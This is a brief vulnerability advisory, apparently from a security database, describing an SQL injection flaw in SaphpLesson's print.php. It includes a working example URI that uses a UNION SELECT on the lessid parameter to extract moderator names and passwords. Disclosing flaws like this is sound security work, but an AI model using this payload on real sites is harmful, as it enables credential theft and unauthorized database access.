SaphpLesson Print.PHP SQL Injection Vulnerability

info
discussion
exploit
solution
references

SaphpLesson Print.PHP SQL Injection Vulnerability

This issue can be exploited through a web client.

An example URI has been provided:

http://www.example.com/lesson/print.php?lessid=-1%20union20select20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor